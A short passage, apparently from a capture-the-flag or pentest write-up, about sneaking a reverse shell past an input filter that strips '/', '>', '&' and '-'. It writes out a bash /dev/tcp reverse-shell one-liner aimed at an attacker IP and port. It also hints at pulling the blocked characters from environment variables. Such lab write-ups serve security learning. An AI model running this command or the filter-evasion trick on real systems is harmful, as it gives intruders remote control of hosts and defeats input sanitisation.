Characters '/ > & -' are not processed. But we want a reverse tcp one liner. We can workaround these characters using the following methods
Basically our reverse shell command /bin/bash -i >& /dev/tcp/10.10.14.39/443 0>&1 will not be executed successfully as / characters are being replaced. How do we get around this?
If Env contains a variable we can use. For example, the / character is being escaped during our exploitation phase to get a reverse shell.